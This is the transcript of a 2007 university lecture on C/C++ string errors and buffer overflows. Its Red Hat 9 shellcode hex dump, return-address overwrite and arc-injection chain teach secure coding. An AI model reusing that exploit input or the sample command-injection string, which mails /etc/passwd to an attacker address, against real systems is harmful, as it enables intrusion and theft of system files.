
Strings

Explore C and C++ string handling, learn about common errors like unbounded copying and truncation, and discover best practices for secure string manipulation.


Presentation Transcript


  1. Strings COEN 150 Spring 2007

  2. Strings • Strings are a fundamental concept, but they are not a built-in data type in C/C++. • C-Strings • C-style string: character array terminated by first null character. • Wide string: wide character array terminated by first null character. • C++ Strings • Several classes • Standard template class: • std::basic_string, std::string, std::wstring • C-style and C++-style strings are distinct types and are not interchangeable: getting a C-style string out of a std::string takes an explicit call such as c_str().

  3. Strings [Figure: the character array h e l l o \0, with "length" spanning the five characters before the null] • C-style strings consist of a contiguous sequence of characters terminated by and including the first null character. • A pointer to a string points to its initial character. • The length of a string is the number of bytes preceding the null character. • The value of a string is the sequence of the values of the contained characters, in order.

  4. Strings • Common Errors: • Unbounded string copies • Null-termination errors • Truncation • Write outside array bounds • Off-by-one errors • Improper data sanitization

  5. Strings • What’s wrong? #include <stdio.h> int main(void) { char Password[80]; puts("Enter 8 character password:"); gets(Password); return 0; } • gets: The program reads from standard input until a newline character is read or an end of file (EOF) condition is encountered. gets has no way to limit how much it writes, and it was removed from the C standard in C11. • The programmer does not know the size of the input. • The standard (vulnerable) solution allocates a much bigger buffer than the expected input. • UNBOUNDED STRING COPY
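
One bounded alternative to gets is fgets, which takes the buffer size as an argument. The following is a minimal sketch, not a definitive implementation; read_line and its return codes are hypothetical names chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* read_line (hypothetical helper): reads one line from `in` into `buf`,
 * which has room for `size` bytes, and strips the trailing newline.
 * Returns 0 on success, 1 if the line was too long (the excess is
 * discarded), and -1 on end of file or a read error. */
int read_line(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }

    /* No newline was stored: either the line filled the buffer or the
     * input ended without one. Peek at the next character to decide. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 0;
    while (c != EOF && c != '\n')
        c = fgetc(in);
    return 1;
}
```

A caller would declare char Password[80] as on the slide and call read_line(stdin, Password, sizeof Password), treating a return value of 1 as invalid input instead of silently accepting a truncated password.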

  6. Strings • What’s wrong? #include <string.h> int main(int argc, char *argv[]) { char name [2048]; strcpy(name, argv[1]); strcat(name, " = "); strcat(name, argv[2]); return 0; }
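
The strcpy/strcat sequence above can be made safe by checking the lengths of all pieces against the destination size before anything is written. This is a sketch under that assumption; join_pair is a hypothetical helper, not part of any library.

```c
#include <stddef.h>
#include <string.h>

/* join_pair (hypothetical helper): writes "<key> = <value>" into dst,
 * which has room for dst_size bytes. Returns 0 on success, or -1
 * (leaving dst untouched) if the result would not fit. */
int join_pair(char *dst, size_t dst_size, const char *key, const char *value)
{
    static const char sep[] = " = ";
    const size_t sep_len = sizeof sep - 1;
    const size_t key_len = strlen(key);
    const size_t val_len = strlen(value);

    /* Compare each piece against the space still available, so the
     * length arithmetic itself can never wrap around. */
    if (dst_size == 0 || key_len > dst_size - 1)
        return -1;
    size_t room = dst_size - 1 - key_len;  /* bytes left, excluding the '\0' */
    if (sep_len > room || val_len > room - sep_len)
        return -1;

    memcpy(dst, key, key_len);
    memcpy(dst + key_len, sep, sep_len);
    memcpy(dst + key_len + sep_len, value, val_len + 1);  /* +1 copies the '\0' */
    return 0;
}
```

In the program on the slide, main would also need to confirm argc >= 3 before reading argv[1] and argv[2], and could then call join_pair(name, sizeof name, argv[1], argv[2]).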

  7. Strings • Same Problem: • The command-line arguments can be of arbitrary length. • However, here we can get the length of the string beforehand: #include <string.h> #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if (argc < 2) return 1; /* no argument to copy */ char *buff = (char *)malloc(strlen(argv[1])+1); if (buff != NULL) { strcpy(buff, argv[1]); printf("argv[1] = %s.\n", buff); free(buff); } else { /* Couldn't get the memory - recover */ } return 0; }

  8. Strings • C++ allows the same type of mistake. • Overflows buffer when input is longer than 11 characters. • cin extraction ends with a valid white space, a null character, or an EOF. • UNBOUNDED STRING COPY #include <iostream> using namespace std; int main() { char buf[12]; cin >> buf; cout<< "echo: " << buf << endl; return 0; }

  9. Strings • Correct Version: • Set the field width (ios_base::width) to a positive value. • cin.width(12) limits the extraction of characters so that at most 12 characters, including the terminating 0 character are read at a time. #include <iostream> using namespace std; int main() { char buf[12]; cin.width(12); cin >> buf; cout<< "echo: " << buf << endl; return 0; }

  10. Strings • What is wrong with this code? #include <string.h> #include <stdio.h> int main(int argc, char *argv[]) { 1 char a[16]; 2 char b[16]; 3 char c[32]; 5 strcpy(a, "0123456789abcdef"); 6 strcpy(b, "0123456789abcdef"); 7 strcpy(c, a); 8 strcat(c, b); 9 printf("a = %s\n", a); 10 return 0; } • The static allocation for the character arrays a, b, and c fails to allocate space for the null-termination character: each 16-character literal needs 17 bytes. • The strcpy (5) writes the terminating null byte just past the end of a, and the strcpy (6) might overwrite this null byte. • This depends on how the compiler allocates memory. • If the byte is overwritten, then a points to an unterminated run of 32 characters, so the strcpy (7) writes beyond the bounds of c and the strcat (8) extends the overflow. • Experience will vary depending on the compiler and debug / release version. • These errors can lie dormant for a long time until awakened by a simple program change. • NULL TERMINATION ERROR

  11. From ISO/IEC 9899:1999 • The strncpy function char *strncpy(char * restrict s1, const char * restrict s2, size_t n); copies not more than n characters (characters that follow a null character are not copied) from the array pointed to by s2 to the array pointed to by s1. • Footnote 260: Thus, if there is no null character in the first n characters of the array pointed to by s2, the result will not be null-terminated.
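
Because of that footnote, code that uses strncpy usually has to terminate the destination itself. A minimal sketch of the common idiom follows; copy_terminated is a hypothetical wrapper name, and the copy silently truncates, which is a separate problem.

```c
#include <stddef.h>
#include <string.h>

/* copy_terminated (hypothetical wrapper): copies at most dst_size - 1
 * characters of src into dst and always null-terminates the result. */
void copy_terminated(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return;
    strncpy(dst, src, dst_size - 1);  /* may leave dst without a '\0' ... */
    dst[dst_size - 1] = '\0';         /* ... so terminate it explicitly  */
}
```

With char a[16], the call copy_terminated(a, sizeof a, "0123456789abcdef") stores the first 15 characters and a terminating null, so a later printf("%s") cannot run past the array.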

  12. Strings • String Truncation • Functions that restrict the number of bytes are often recommended to mitigate buffer overflow vulnerabilities • strncpy() instead of strcpy() • fgets() instead of gets() • snprintf() instead of sprintf() • Strings that exceed the specified limits are truncated • Truncation results in a loss of data and, in some cases, in software vulnerabilities
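
Truncation can be detected instead of ignored, because snprintf returns the length the full result would have had. The sketch below assumes a hypothetical build_path helper to show the idea; the file names are made up for illustration.

```c
#include <stdbool.h>
#include <stdio.h>

/* build_path (hypothetical helper): formats "<dir>/<file>" into dst.
 * Returns true only if the complete path fit into dst_size bytes. */
bool build_path(char *dst, size_t dst_size, const char *dir, const char *file)
{
    int n = snprintf(dst, dst_size, "%s/%s", dir, file);
    /* n is the length the untruncated string needs, excluding the '\0'. */
    return n >= 0 && (size_t)n < dst_size;
}
```

With a 16-byte buffer, build_path(path, sizeof path, "/tmp", "report.txt.bak") returns false and leaves "/tmp/report.txt" in the buffer: the truncated result names a different file, which is how silent truncation can turn into a vulnerability.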

  13. Strings: Off-by-One Errors • Find all off-by-one errors: 1. int main(int argc, char* argv[]) { 2. char source[10]; 3. strcpy(source, "0123456789"); 4. char *dest = (char *)malloc(strlen(source)); 5. for (int i=1; i <= 11; i++) { 6. dest[i] = source[i]; 7. } 8. dest[i] = '\0'; 9. printf("dest = %s", dest); 10. } • source is 10 bytes long, but strcpy writes 11 bytes into it (10 characters plus the terminating null). • The value returned by strlen does not take the null byte into account; hence, dest is too small. • The for loop variable starts at 1, but string indices start at 0. • The for loop stop condition is off: the loop runs through index 11, past the end of both arrays. • The assignment (8) is an out-of-bounds write.
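
For comparison, here is one way the copy could be written with each of the listed errors removed. It is a sketch, not the presentation's own solution; duplicate is a hypothetical function name, and the caller's source array would need 11 bytes to hold "0123456789".

```c
#include <stdlib.h>
#include <string.h>

/* duplicate (hypothetical name): returns a heap copy of source,
 * or NULL if the allocation fails. The caller frees the result. */
char *duplicate(const char *source)
{
    size_t len = strlen(source);
    char *dest = malloc(len + 1);        /* +1 for the terminating null */
    if (dest == NULL)
        return NULL;
    for (size_t i = 0; i < len; i++)     /* indices run from 0 to len - 1 */
        dest[i] = source[i];
    dest[len] = '\0';                    /* last valid index is len */
    return dest;
}
```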

  14. Strings • String Errors without Functions • Since C-style strings are character arrays, it is possible to perform insecure string manipulations without explicitly calling any “dangerous” functions, such as strcpy(), strcat(), gets(), streadd(), strecpy(), … #include <stdio.h> int main(int argc, char *argv[]) { int i = 0; char buff[128]; char *arg1 = argv[1]; while (arg1[i] != '\0' ) { buff[i] = arg1[i]; i++; } buff[i] = '\0'; printf("buff = %s\n", buff); }
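
The loop above becomes safe once the index is also checked against the buffer size. The following sketch keeps the hand-written loop and adds that bound; copy_arg is a hypothetical name.

```c
#include <stdbool.h>
#include <stddef.h>

/* copy_arg (hypothetical helper): copies src into buff, which has room
 * for buff_size bytes. Always null-terminates when buff_size > 0.
 * Returns true if all of src fit, false if it had to be truncated. */
bool copy_arg(char *buff, size_t buff_size, const char *src)
{
    size_t i = 0;
    if (buff_size == 0)
        return false;
    /* Stop one short of the end so the terminator always fits. */
    while (src[i] != '\0' && i < buff_size - 1) {
        buff[i] = src[i];
        i++;
    }
    buff[i] = '\0';
    return src[i] == '\0';
}
```

In the program on the slide this would be called as copy_arg(buff, sizeof buff, argv[1]) after confirming that argc >= 2.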

  15. Strings • Improper Data Sanitization • A much bigger problem, but here is a simple example: An application inputs an email address from a user and writes the address to a buffer [Viega 03] sprintf(buffer, "/bin/mail %s < /tmp/email", addr); The buffer is then executed using the system() call. The risk is, of course, that the user enters the following string as an email address: bogus@addr.com; cat /etc/passwd | mail some@badguy.net
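
One common defense is to accept only input made of characters from a known-safe set before it gets anywhere near a shell. The sketch below is an assumption-laden illustration, not a full address validator: is_plausible_address is a hypothetical name, and the allowed character set is deliberately narrower than what real mail addresses permit.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

/* is_plausible_address (hypothetical helper): accepts only letters,
 * digits, and a few punctuation characters, with exactly one '@'.
 * Shell metacharacters such as ';', '|', '<', and spaces are rejected. */
bool is_plausible_address(const char *addr)
{
    size_t at_signs = 0;

    /* Reject empty input and a leading '-', which a mail program
     * could interpret as a command-line option. */
    if (addr[0] == '\0' || addr[0] == '-')
        return false;

    for (size_t i = 0; addr[i] != '\0'; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (c == '@')
            at_signs++;
        else if (!isalnum(c) && c != '.' && c != '_' && c != '-' && c != '+')
            return false;
    }
    return at_signs == 1;
}
```

The address bogus@addr.com passes this check, while the attack string from the slide fails at the first ';'. Avoiding system() altogether, so that no shell ever parses the address, is generally the more robust design.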

  16. Strings String Vulnerabilities

  17. Commercial Message • Learn how to find cyber-crime • Find out what Law & Order does not show. • Learn about exploits. • TAKE COEN 252

  18. Strings • A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure. [Figure: a copy operation writes 11 bytes of data from source memory into 8 bytes of allocated memory, spilling over into other memory]

  19. Strings • Buffer overflows occur because we usually do not check bounds. • Many standard library functions do not check bounds. • Programmers do not check bounds. • Not all buffer overflows are exploitable.

  20. Strings • Process Memory Organization Code or Text: Instructions and read only data Data: Initialized data, uninitialized data, static variables, global variables Heap: Dynamically allocated variables Stack: Local variables, return addresses, etc.

  21. Strings: Stack Management • When calling a subroutine / function: • Stack stores the return address • Stack stores arguments, return values • Stack stores variables local to the subroutine • Information pushed on the stack for a subroutine call is called a frame. • Address of frame is stored in the frame or base pointer register. • ebp on Intel architectures

  22. Strings: Stack Management #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdbool.h> bool IsPasswordOkay(void) { char Password[8]; gets(Password); /* unbounded read: the vulnerability under study */ if (!strcmp(Password, "badprog")) return(true); else return(false); } int main(void) { bool PwStatus; puts("Enter password:"); PwStatus = IsPasswordOkay(); if (PwStatus == false){ puts("Access denied"); exit(-1); } else puts("Access granted"); return 0; }

  23. Strings: Stack Management • Program stack before call to IsPasswordOkay() [Stack diagram] Code: puts("Enter Password:"); PwStatus=IsPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied");

  24. Strings: Stack Management • Program stack during call to IsPasswordOkay() [Stack diagram] Code: puts("Enter Password:"); PwStatus=IsPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied"); bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false); }

  25. Strings: Stack Management • Program stack after call to IsPasswordOkay() [Stack diagram] Code: puts("Enter Password:"); PwStatus=IsPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied");

  26. Strings: Buffer Overflow Example #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdbool.h> bool IsPasswordOkay(void) { char Password[8]; gets(Password); /* unbounded read: the vulnerability under study */ if (!strcmp(Password, "badprog")) return(true); else return(false); } int main(void) { bool PwStatus; puts("Enter password:"); PwStatus = IsPasswordOkay(); if (PwStatus == false){ puts("Access denied"); exit(-1); } else puts("Access granted"); return 0; } • What happens if we enter more than 7 characters of an input string?

  27. Strings: Buffer Overflow Example [Stack diagram] Code: bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false); } • The return address and other data on the stack are overwritten because the memory space allocated for the password can hold at most 7 characters plus the null terminator.

  28. Strings: Buffer Overflow Example • A specially crafted string “abcdefghijklW►*!” produced the following result: [screenshot of the program run]

  29. Strings: Buffer Overflow Example • The string “abcdefghijklW►*!” overwrote 9 extra bytes of memory on the stack, changing the caller's return address and thus skipping the execution of line 3. [Stack diagram]
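
For contrast with the vulnerable IsPasswordOkay, the following sketch reads the password with a bounded call and rejects over-long input instead of letting it reach the return address. It is one possible repair under stated assumptions: is_password_okay is a hypothetical variant that takes the input stream as a parameter so it can be exercised without a terminal.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* is_password_okay (hypothetical variant): reads one line from `in`
 * and compares it with the expected password. Input longer than the
 * buffer is consumed and rejected rather than written past the array. */
bool is_password_okay(FILE *in)
{
    char password[8];

    if (fgets(password, sizeof password, in) == NULL)
        return false;

    size_t len = strcspn(password, "\n");
    if (password[len] != '\n') {
        /* The buffer filled before a newline was seen. Drain the rest
         * of the line and remember whether anything was left over. */
        bool extra = false;
        int c;
        while ((c = fgetc(in)) != '\n' && c != EOF)
            extra = true;
        if (extra)
            return false;
    }
    password[len] = '\0';
    return strcmp(password, "badprog") == 0;
}
```

Called as is_password_okay(stdin), the crafted 16-character string from the slides is simply rejected, because no more than 7 characters are ever stored in the 8-byte array.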

  30. Exploitation of Buffer Overflows • A buffer overflow can be exploited by • Changing the return address to point at existing code in order to change the program flow (arc injection) • Changing the return address to point into the buffer, where the attacker has placed malicious code (code injection)

  31. Exploitation of Buffer Overflows • The get password program can be exploited to execute arbitrary code by providing the following binary data file as input:
      000  31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36  "1234567890123456"
      010  37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF  "789012345678...."
      020  31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB  "1..............."
      030  F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31  "...............1"
      040  31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A  "111/usr/bin/cal."
      (non-printable bytes are shown as '.')
      • This exploit is specific to Red Hat Linux 9.0 and GCC

  32. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The first 16 bytes of binary data fill the allocated storage space for the password. • NOTE: Even though the program only allocated 12 bytes for the password, the version of the gcc compiler used allocates stack data in multiples of 16 bytes.

  33. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a 16-byte boundary.

  34. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a 16-byte boundary.

  35. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The next 4 bytes overwrite the return address. • The new return address is 0xBFFFF9E0, which appears in the input as E0 F9 FF BF because x86 stores multi-byte values in little-endian order (least significant byte first).
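
The byte order can be checked with a few lines of C. This is a small illustrative sketch; store_le32 is a hypothetical helper that writes a 32-bit value least significant byte first, independent of the host's own byte order.

```c
#include <stdint.h>

/* store_le32 (hypothetical helper): writes value into out[0..3],
 * least significant byte first, as a little-endian CPU would store it. */
void store_le32(uint32_t value, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));  /* keep the low 8 bits */
}
```

Calling store_le32(0xBFFFF9E0u, bytes) fills bytes with E0, F9, FF, BF, matching the four bytes at offset 01C of the exploit input.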

  36. Exploitation of Buffer Overflows

  37. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The malicious code. • Purpose of the malicious code is to call execve with a user-provided set of parameters. • In this program, instead of spawning a shell, we just call the Linux calendar program (/usr/bin/cal).

  38. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The malicious code: • xor %eax,%eax #set eax to zero • mov %eax,0xbffff9ff #set to NULL word • Create a zero value and use it to null-terminate the argument list.

  39. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The malicious code: • xor %eax,%eax #set eax to zero • mov %eax,0xbffff9ff #set to NULL word • mov $0xb,%al #set code for execve • Set the value of register al to 0xb. This value indicates a system call to execve.

  40. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The malicious code: • mov $0xb,%al #set code for execve • mov $0xbffffa03,%ebx #ptr to arg 1 • mov $0xbffff9fb,%ecx #ptr to arg 2 • mov 0xbffff9ff,%edx #ptr to arg 3 • This puts the pointers to the arguments into the ebx, ecx, and edx registers.

  41. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The malicious code: • mov $0xbffffa03,%ebx #ptr to arg 1 • mov $0xbffff9fb,%ecx #ptr to arg 2 • mov 0xbffff9ff,%edx #ptr to arg 3 • int $0x80 # make system call to execve • Now make the system call to execve. The arguments are in the registers.

  42. Exploitation of Buffer Overflows (exploit input as listed on slide 31) • The malicious code: • The last part of the input holds the arguments.

  43. Exploitation of Buffer Overflows • ./BufferOverflow < exploit.bin now executes /usr/bin/cal\0.

  44. Exploitation of Buffer Overflows Arc Injection

  45. Exploitation of Buffer Overflows #include <string.h> int get_buff(char *user_input) { char buff[4]; memcpy(buff, user_input, sizeof(user_input)); return 0; } int main(int argc, char *argv[]) { get_buff(argv[1]); return 0; }
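
In get_buff, sizeof(user_input) yields the size of the pointer, not the length of the string it points to, so the number of bytes copied depends on the platform's pointer width and exceeds buff wherever pointers are wider than 4 bytes. A bounded version would compare the actual input length with the size of the array; the sketch below assumes a hypothetical get_buff_checked that reports failure with -1.

```c
#include <stddef.h>
#include <string.h>

/* get_buff_checked (hypothetical variant of get_buff): copies the input
 * only if it fits into buff together with its terminating null. */
int get_buff_checked(const char *user_input)
{
    char buff[4];
    size_t len = strlen(user_input);

    /* sizeof buff is the size of the array (4), unlike sizeof on a
     * pointer parameter, which is the size of the pointer itself. */
    if (len >= sizeof buff)
        return -1;
    memcpy(buff, user_input, len + 1);  /* +1 copies the '\0' */
    return 0;
}
```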

  46. Exploitation of Buffer Overflows • Stack before and after executing get_buff(argv[1]) with attacker provided string. [Figure, before: esp → buff[4]; ebp → saved ebp (main); return addr (main); stack frame of main. After: esp → buff[4]; Frame 1: ebp (frame 2), address of f(), eip (leave/ret), f() argptr, "f() arg data"; Frame 2: ebp (frame 3), address of g(), eip (leave/ret), g() argptr, "g() arg data"; original frame: ebp (orig), return addr (main).] • The return address has been replaced with the address of f().

  47. Exploitation of Buffer Overflows • The exploited function get_buff returns by executing: mov esp, ebp; pop ebp; ret • The frame pointer (now pointing to Frame 2) is moved into the stack pointer. • Control is returned to the address on the stack, which has been overwritten with the address of the arbitrary function f().

  48. Exploitation of Buffer Overflows • When f() returns, it pops the stored eip off the stack and transfers control to this address. [Figure: esp → buff[4]; Frame 1: ebp (frame 2), address of f(), eip (leave/ret), f() argptr, "f() arg data"; Frame 2: ebp (frame 3), address of g(), eip (leave/ret), g() argptr, "g() arg data"; original frame: ebp (orig), return addr (main).]

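  49. [Figure: the original stack (esp → buff[4]; ebp → saved ebp (main); return addr (main); stack frame of main) next to the overwritten stack, which now chains three frames. Frame 1: ebp (frame 2), address of f(), eip (leave/ret), f() argptr, "f() arg data"; Frame 2: ebp (frame 3), address of g(), eip (leave/ret), g() argptr, "g() arg data"; Frame 3: ebp (frame 4), address of h(), eip (leave/ret), h() argptr, "h() arg data"; original frame: ebp (orig), return addr (main).] • leave/ret is either the sequence mov esp, ebp; pop ebp; ret or the sequence leave; ret.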

  50. Exploitation of Buffer Overflows • Result: • Control is returned to the address of an arbitrary function f(). • This function is provided with arguments installed on the stack. • Attacker could have added additional function calls or attacker could have returned to the main function for continuation of the program. • For example, attacker could first call setuid(), then call system()
